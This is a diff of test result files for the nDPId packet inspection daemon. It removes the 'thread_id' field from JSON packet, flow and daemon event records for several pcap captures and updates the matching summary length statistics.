00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1422329136181,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1422329136181,"pkt":"\/\/\/\/\/\/\/\/uDhh8wWsCABFwACXAGlAAP8Rr3rAqAoK\/\/\/\/\/zBcFH4AgwAAACACEAAAAAAGWAogaQ4g\/wAAABMAAGYAABQAAQEAJwAoAgIAAQBAlgAAAAAEAQAAAABAlgAAAQAEBwVmAABAlgAAAgAEDAQZAAApAAEEACwAAQEAJQAKAECWAADPAQAAAQAlABYAQJYAAAVBUGI4MzguNjFmMy4wNWFj"}
00804{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":378,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":389,"pkt_type":375,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":389,"pkt_l4_len":0,"thread_ts_msec":1422329141029,"pkt":"AQAMzMzMuDhh8wWsAXeqqgMAAAwgAAK0KHQAAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAWR2lnYWJpdEV0aGVybmV0MC4xAAQACAAAAAMACwAFAQAQAAY8KAAZABCkjQABAAA8KAAAMsg="} 00790{"packet_event_id":1,"packet_event_name":"packet","packet_id":378,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":389,"pkt_type":375,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":389,"pkt_l4_len":0,"thread_ts_msec":1422329141029,"pkt":"AQAMzMzMuDhh8wWsAXeqqgMAAAwgAAK0KHQAAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAWR2lnYWJpdEV0aGVybmV0MC4xAAQACAAAAAMACwAFAQAQAAY8KAAZABCkjQABAAA8KAAAMsg="}
00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":378,"source":"capwap.pcap","alias":"nDPId-test","layer_type":375,"global_ts_msec":1422329141909} 00183{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":378,"source":"capwap.pcap","alias":"nDPId-test","layer_type":375,"global_ts_msec":1422329141909}
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":379,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1422328963915,"flow_last_seen":1422328966914,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1422329141029,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":49259,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":379,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1422328963915,"flow_last_seen":1422328966914,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1422329141029,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":49259,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1422329005766,"flow_last_seen":1422329136181,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":492,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1422329175528,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":12380,"dst_port":5246,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1422329005766,"flow_last_seen":1422329136181,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":492,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1422329175528,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":12380,"dst_port":5246,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":217,"flow_first_seen":1422329005767,"flow_last_seen":1422329174862,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":1457,"flow_tot_l4_payload_len":54560,"flow_avg_l4_payload_len":251,"midstream":0,"thread_ts_msec":1422329175528,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12380,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} 00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":217,"flow_first_seen":1422329005767,"flow_last_seen":1422329174862,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":1457,"flow_tot_l4_payload_len":54560,"flow_avg_l4_payload_len":251,"midstream":0,"thread_ts_msec":1422329175528,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12380,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
@@ -58,6 +58,6 @@
~~ total memory freed........: 4695503 bytes ~~ total memory freed........: 4695503 bytes
~~ total allocations/frees...: 101554/101554 ~~ total allocations/frees...: 101554/101554
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 200 chars ~~ json string min len.......: 186 chars
~~ json string max len.......: 820 chars ~~ json string max len.......: 806 chars
~~ json string avg len.......: 509 chars ~~ json string avg len.......: 495 chars

10
test/results/dlt_ppp.pcap.out
View File

@@ -1,6 +1,6 @@
00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dlt_ppp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dlt_ppp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
01941{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1,"source":"dlt_ppp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1230,"pkt_type":33,"pkt_l3_offset":2,"pkt_l4_offset":0,"pkt_len":1230,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"ACFFAgTMQT1AAD8RDTPBpwD8wadkZKwzAbsEuAAAz\/8AAB0MtxIpOpsU8gzQWdyoBJhpwdcARJZ0OsZN0bl8VJfvOykoeuttM0eMWHJwpGpOPAqWh0GUfp9IIe82zPEOJxxbudM5\/pOWImGkMJYnZKC4oc+Wie817ZluT3qGlbT6FmvR7wgU3ZlqiJlO4+0DRHL4d\/DzL3RfCdhaKCfxoviWr9OOaF9xayHBTgloTkVIbSLderihnwr+mk7qqrStghVdXJFtnOWHTzAMdmPpzaY99oTPzZwWklZzjG9W5shdxiA8ok\/3pt2WMY3QJIDzbHzKP+7ZsLr5YGFFIYxx1JspmQXO5+U3jVl43o7+huGmMmGYHNdWbRYYgFoAkcV642cnCac+cZPVd9ar\/XFRGfd\/WaFVK+zvTNX+exQ7Y3ZIotGRLaPFvGpj3H1W9HNWBEKODu7hETU2OX\/NaZuNjAbfxxKVTC9o6LUxoTVjag4leuFawG3pE6XLxFh9fenfXyYspIGy40nX701+znmPySuhrrYghEKqHVTFz\/fjb5y59pxDqwfx2gz+0tLjNRNMLdNY1Ag+BpNZPQBZDxS1Q4nlCfUqLKWSJpEsd+mHyUC3pRaolG8Jpu68ULGXjJ4ZKS7952WY2QtbjEtiMSGVNPERp0foW+HREy8qKb+tFgJ65NsBWY0E9\/jJGGpFUnix\/C7BDjtX\/ZgK9gfyvVQabBdj7mBntuOhNmnilWaVEIOX7CKCv2V+0LQWQOOVtmTWBQy0XrnBP7R005Av3+pdvoITeQ2zEo762fyDmFlboLbmiVV7z4cyXPPQL6MPya78HzZSLTnm3Xxv8O87bNxZE+T0J9baS33P9HRocrLvAjLFAWSMQbXzM6RAx0uu2+2kxSt4LNQRr+Nvhj9iZm0i+9tU23DVWOg6UFW+uqUPF0ds+jp9XdVBP+b6UC3e79iGd\/QTg4M7OYt7pt75ojnbr+ZjxHE8B0GZ1bPhHUhQ\/439iohTEuvizuLosg\/9ETTUUdbasnXh9D\/+SO51ABAnZvM6SDJ1pj177GYIwa\/ZqyWvarQpS41HFFKu4RYpQHjOT56xqgSjrLEWXyerkTEX8shaJqUzTf0hupuyCJ\/APa3545+ZYzvcCDGD7g4mx1kJ6bCPcx5s\/v5xv0RJBodp9K1hK4v\/DTDZxZGtU5gN0XXnA0WlvhheGJ1S\/ZaCizvBvbTeu8i2DUwd4Wme2LeIVwWL1YRsoozl32VaoHYmsfd7GuS4nwcSIq7qOKc\/v0ngj3r3ND1Z2VcoyXNbqPLJo2kpXaoXlSfOfSzoS+BYoeB3qst\/3RnzIpMan+YfjUUqTAsAH+lgJatdqf9zS60Yl5fSUpCDIosbThj4VOLqNKWrLQjA8v+93FIA3\/NFEDMSuNxj605kSA9S9GRrTJHsR5osW14O2xZRF\/BiXyz77L3\/OW35KvEzzuGXD5Apmt9048cnckQ+W8pGZui61Z81+NpEDiVl5\/7woKFPqgJn9vKV42rT4DXlRToJ8qpzLeevd936RndwoN8DMGcbfT7BT7\/CndBaHTk\/Xoi\/g0FlSSofCargF+zZqnP61iuG15DY\/IC7bC0k3NnOEoXpUUSiCOrtQOJtDXQygOL8Gb9V"} 01927{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"dlt_ppp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1230,"pkt_type":33,"pkt_l3_offset":2,"pkt_l4_offset":0,"pkt_len":1230,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"ACFFAgTMQT1AAD8RDTPBpwD8wadkZKwzAbsEuAAAz\/8AAB0MtxIpOpsU8gzQWdyoBJhpwdcARJZ0OsZN0bl8VJfvOykoeuttM0eMWHJwpGpOPAqWh0GUfp9IIe82zPEOJxxbudM5\/pOWImGkMJYnZKC4oc+Wie817ZluT3qGlbT6FmvR7wgU3ZlqiJlO4+0DRHL4d\/DzL3RfCdhaKCfxoviWr9OOaF9xayHBTgloTkVIbSLderihnwr+mk7qqrStghVdXJFtnOWHTzAMdmPpzaY99oTPzZwWklZzjG9W5shdxiA8ok\/3pt2WMY3QJIDzbHzKP+7ZsLr5YGFFIYxx1JspmQXO5+U3jVl43o7+huGmMmGYHNdWbRYYgFoAkcV642cnCac+cZPVd9ar\/XFRGfd\/WaFVK+zvTNX+exQ7Y3ZIotGRLaPFvGpj3H1W9HNWBEKODu7hETU2OX\/NaZuNjAbfxxKVTC9o6LUxoTVjag4leuFawG3pE6XLxFh9fenfXyYspIGy40nX701+znmPySuhrrYghEKqHVTFz\/fjb5y59pxDqwfx2gz+0tLjNRNMLdNY1Ag+BpNZPQBZDxS1Q4nlCfUqLKWSJpEsd+mHyUC3pRaolG8Jpu68ULGXjJ4ZKS7952WY2QtbjEtiMSGVNPERp0foW+HREy8qKb+tFgJ65NsBWY0E9\/jJGGpFUnix\/C7BDjtX\/ZgK9gfyvVQabBdj7mBntuOhNmnilWaVEIOX7CKCv2V+0LQWQOOVtmTWBQy0XrnBP7R005Av3+pdvoITeQ2zEo762fyDmFlboLbmiVV7z4cyXPPQL6MPya78HzZSLTnm3Xxv8O87bNxZE+T0J9baS33P9HRocrLvAjLFAWSMQbXzM6RAx0uu2+2kxSt4LNQRr+Nvhj9iZm0i+9tU23DVWOg6UFW+uqUPF0ds+jp9XdVBP+b6UC3e79iGd\/QTg4M7OYt7pt75ojnbr+ZjxHE8B0GZ1bPhHUhQ\/439iohTEuvizuLosg\/9ETTUUdbasnXh9D\/+SO51ABAnZvM6SDJ1pj177GYIwa\/ZqyWvarQpS41HFFKu4RYpQHjOT56xqgSjrLEWXyerkTEX8shaJqUzTf0hupuyCJ\/APa3545+ZYzvcCDGD7g4mx1kJ6bCPcx5s\/v5xv0RJBodp9K1hK4v\/DTDZxZGtU5gN0XXnA0WlvhheGJ1S\/ZaCizvBvbTeu8i2DUwd4Wme2LeIVwWL1YRsoozl32VaoHYmsfd7GuS4nwcSIq7qOKc\/v0ngj3r3ND1Z2VcoyXNbqPLJo2kpXaoXlSfOfSzoS+BYoeB3qst\/3RnzIpMan+YfjUUqTAsAH+lgJatdqf9zS60Yl5fSUpCDIosbThj4VOLqNKWrLQjA8v+93FIA3\/NFEDMSuNxj605kSA9S9GRrTJHsR5osW14O2xZRF\/BiXyz77L3\/OW35KvEzzuGXD5Apmt9048cnckQ+W8pGZui61Z81+NpEDiVl5\/7woKFPqgJn9vKV42rT4DXlRToJ8qpzLeevd936RndwoN8DMGcbfT7BT7\/CndBaHTk\/Xoi\/g0FlSSofCargF+zZqnP61iuG15DY\/IC7bC0k3NnOEoXpUUSiCOrtQOJtDXQygOL8Gb9V"}
00184{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":9,"thread_id":0,"packet_id":1,"source":"dlt_ppp.pcap","alias":"nDPId-test","protocol":33,"global_ts_msec":1031} 00170{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":9,"packet_id":1,"source":"dlt_ppp.pcap","alias":"nDPId-test","protocol":33,"global_ts_msec":1031}
00458{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"dlt_ppp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":4,"global_ts_msec":1031} 00458{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"dlt_ppp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":4,"global_ts_msec":1031}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 1/0 ~~ packets captured/processed: 1/0
@@ -14,6 +14,6 @@
~~ total memory freed........: 4678926 bytes ~~ total memory freed........: 4678926 bytes
~~ total allocations/frees...: 101140/101140 ~~ total allocations/frees...: 101140/101140
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 189 chars ~~ json string min len.......: 175 chars
~~ json string max len.......: 1946 chars ~~ json string max len.......: 1932 chars
~~ json string avg len.......: 979 chars ~~ json string avg len.......: 968 chars

32
test/results/dns_fragmented.pcap.out
View File

@@ -5,29 +5,29 @@
00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1558968008021,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1558968008021,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
02439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1558968008021,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1558968008021,"pkt":"AIac51UUAAwpil3XCABFAAXc0P4gAEARCebBGOPurNkoTAA13WgGrrRj1D+EEAABAAQAAAABCHdlYmVybGFiAmRlAAAwAAHADAAwAAEAAAA8AggBAQMKAwEAAd3v\/e0irXYKOwtYEB3VPe7z99qvi5le9\/y1XXyplp5y\/5xaqrm\/relG8pgx8GsNW2IgviJKAJ6UiU45ERKoH+fz2qf2SUFHFWwkweiWyLZ4EZHhowviCEx94P4OswNKXmdYHe38rlHPa+3OypW9gYfR9lhCKK3neCPq8\/aFFsTTI7dQ+Q2kERWiCMCybl4WOwsBo\/RlnPM4yufMKIlABiM5NWQPNmI6jYzAYpYoyUhd9HnnIIDlNQ89HpXQdFmysMraXYb7qDOoOEiOodttKH0y\/vtJ2SRU05RF4AEumacIUzAi5LL2cMQxC7t7rlDI4X42NRfOLAqGuOeclFjzqz3OdAJWeg\/AAnSbb02AGCkQ370TX1hWveAXt6xpPWOLgHXSLIF\/lz+wl+Dm8ZNWDnn5zEJuEj3xova1g8zmRXJOmqA6VhGqewxF8c+yKeNEOHz4X4\/RLmWHIuEbvboP00Dk5A9bhyZGVsytOJg+NwhFQtvBWLmD82FFtfSt2vmbFFNwAZOnRZWJOG9L7TFcGIm1OEULmohUyFLsBGMXDFOu1k0o6pqm495tsBuMyJNpfdQoPwOkUpsKi6jmNq6vRjvvNiJbcFylTQrqHGTGuOopuUsBbUXj\/nOr4I6j42k6GDIuTyLDkaVrdrxXmGnfNnStdqWmvHXo\/YFwdls9bcT7wAwAMAABAAAAPAEIAQADCgMBAAHQVNwo8VCsO0nmM2u3Mcqv14N851ULDM7hf1Hi2ooDrm7SR4cYS\/ptdvSMUJEyqPCUSF3Clw\/mlYs7YppfPvATwlxTT37RaXRQswUTRh4\/3GtYPxZXJOr+Wr2nwf4Rqm1imNixBim+ZLWFho\/CQdJqyhqg2VT8ongtHWFb9Nojmjr1IXZe0LYFcm0d1eoB5YaBtAcRvhm41KfjcjwpW7jDiMH5W1RgefeOj8kBkIJxjV9i9TB7pjmmAvw91J8s0GTTJqo\/ORsAzT8BHg3y6usJtQVH8ezMMHBFbjtgdGJlMoj4kn1KBk8Jtj9ZxjTIZWIo922PVb8sQqj0JytLOU69wAwALgABAAAAPAIfADAKAgAAADxdChURXOJ+MzN7CHdlYmVybGFiAmRlAB+yP4V\/njTX1ZrAUX52Q4ppNzTYQFwUb\/fZ7UyQYLNxrrstLuUEImGhNwZoGn47E0jCxJscYiApT\/lYiL2L1ySUl4RKqHIjPNuYuibs67t5ZabkYsahlYEA\/lOcM3eIQx9pu5Og7p1d2yBSUETOBiGw2mFf2+ESni6Ue4XPXEEYzAhiMRhuYOJAy8gBqoPjkRBcJfWJSQLCsK1uYySkTZfbAzgJeVM0nXd6azgG0BhRE+LeaO6rN3QVHDtfgnwRdZ0mqwEcP9Ixz7o9MUVSKZ24Kp1QfS5nvEHn5PilNALbZYZOO0cQAeV8BhlxVuALLDecEOLC8sY1mx6ozY5\/aRypyHA9HCrJT0qIHJwgtxE7ldoWyzsz32MKgZvCYMZSPOXK\/W3p61FPtD4iT4Id6xXDvyRuALL3waMUMwy3mSjXDHAdpXWaCOMfYx2IzRk4rN5TDQtUohYwaoSbystwDYKnhZGi9jS0G8FObyWhTrKCl7aTkMBaFEejCh0dfD5WJP+MDS\/TR32BG0S+GtGTl4n1Y8wgyP7nkz3\/REcevkIvpJRUImVc8A\/VPTI+9KvBSkoLPA9Za\/IpqUpgDVsKWU5bp0V0TdEryxvtwOnVXXdH0\/hJMgIgWhmZzY2\/UVoRBVGptWsAIhn5sO+UhcjvZ41p3t\/1mWp23BdUACblNtHcw2MALgABAAAAPAEfADAKAgAAADxdChURXOJ+M5BHCHdlYmVybGFiAmRlAHoYKuiyNMNSWsfXwtRR8n\/pKy73at02yEwt1EoWyfptV8sUoxs="} 02439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1558968008021,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1558968008021,"pkt":"AIac51UUAAwpil3XCABFAAXc0P4gAEARCebBGOPurNkoTAA13WgGrrRj1D+EEAABAAQAAAABCHdlYmVybGFiAmRlAAAwAAHADAAwAAEAAAA8AggBAQMKAwEAAd3v\/e0irXYKOwtYEB3VPe7z99qvi5le9\/y1XXyplp5y\/5xaqrm\/relG8pgx8GsNW2IgviJKAJ6UiU45ERKoH+fz2qf2SUFHFWwkweiWyLZ4EZHhowviCEx94P4OswNKXmdYHe38rlHPa+3OypW9gYfR9lhCKK3neCPq8\/aFFsTTI7dQ+Q2kERWiCMCybl4WOwsBo\/RlnPM4yufMKIlABiM5NWQPNmI6jYzAYpYoyUhd9HnnIIDlNQ89HpXQdFmysMraXYb7qDOoOEiOodttKH0y\/vtJ2SRU05RF4AEumacIUzAi5LL2cMQxC7t7rlDI4X42NRfOLAqGuOeclFjzqz3OdAJWeg\/AAnSbb02AGCkQ370TX1hWveAXt6xpPWOLgHXSLIF\/lz+wl+Dm8ZNWDnn5zEJuEj3xova1g8zmRXJOmqA6VhGqewxF8c+yKeNEOHz4X4\/RLmWHIuEbvboP00Dk5A9bhyZGVsytOJg+NwhFQtvBWLmD82FFtfSt2vmbFFNwAZOnRZWJOG9L7TFcGIm1OEULmohUyFLsBGMXDFOu1k0o6pqm495tsBuMyJNpfdQoPwOkUpsKi6jmNq6vRjvvNiJbcFylTQrqHGTGuOopuUsBbUXj\/nOr4I6j42k6GDIuTyLDkaVrdrxXmGnfNnStdqWmvHXo\/YFwdls9bcT7wAwAMAABAAAAPAEIAQADCgMBAAHQVNwo8VCsO0nmM2u3Mcqv14N851ULDM7hf1Hi2ooDrm7SR4cYS\/ptdvSMUJEyqPCUSF3Clw\/mlYs7YppfPvATwlxTT37RaXRQswUTRh4\/3GtYPxZXJOr+Wr2nwf4Rqm1imNixBim+ZLWFho\/CQdJqyhqg2VT8ongtHWFb9Nojmjr1IXZe0LYFcm0d1eoB5YaBtAcRvhm41KfjcjwpW7jDiMH5W1RgefeOj8kBkIJxjV9i9TB7pjmmAvw91J8s0GTTJqo\/ORsAzT8BHg3y6usJtQVH8ezMMHBFbjtgdGJlMoj4kn1KBk8Jtj9ZxjTIZWIo922PVb8sQqj0JytLOU69wAwALgABAAAAPAIfADAKAgAAADxdChURXOJ+MzN7CHdlYmVybGFiAmRlAB+yP4V\/njTX1ZrAUX52Q4ppNzTYQFwUb\/fZ7UyQYLNxrrstLuUEImGhNwZoGn47E0jCxJscYiApT\/lYiL2L1ySUl4RKqHIjPNuYuibs67t5ZabkYsahlYEA\/lOcM3eIQx9pu5Og7p1d2yBSUETOBiGw2mFf2+ESni6Ue4XPXEEYzAhiMRhuYOJAy8gBqoPjkRBcJfWJSQLCsK1uYySkTZfbAzgJeVM0nXd6azgG0BhRE+LeaO6rN3QVHDtfgnwRdZ0mqwEcP9Ixz7o9MUVSKZ24Kp1QfS5nvEHn5PilNALbZYZOO0cQAeV8BhlxVuALLDecEOLC8sY1mx6ozY5\/aRypyHA9HCrJT0qIHJwgtxE7ldoWyzsz32MKgZvCYMZSPOXK\/W3p61FPtD4iT4Id6xXDvyRuALL3waMUMwy3mSjXDHAdpXWaCOMfYx2IzRk4rN5TDQtUohYwaoSbystwDYKnhZGi9jS0G8FObyWhTrKCl7aTkMBaFEejCh0dfD5WJP+MDS\/TR32BG0S+GtGTl4n1Y8wgyP7nkz3\/REcevkIvpJRUImVc8A\/VPTI+9KvBSkoLPA9Za\/IpqUpgDVsKWU5bp0V0TdEryxvtwOnVXXdH0\/hJMgIgWhmZzY2\/UVoRBVGptWsAIhn5sO+UhcjvZ41p3t\/1mWp23BdUACblNtHcw2MALgABAAAAPAEfADAKAgAAADxdChURXOJ+M5BHCHdlYmVybGFiAmRlAHoYKuiyNMNSWsfXwtRR8n\/pKy73at02yEwt1EoWyfptV8sUoxs="}
00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1558968008021,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} 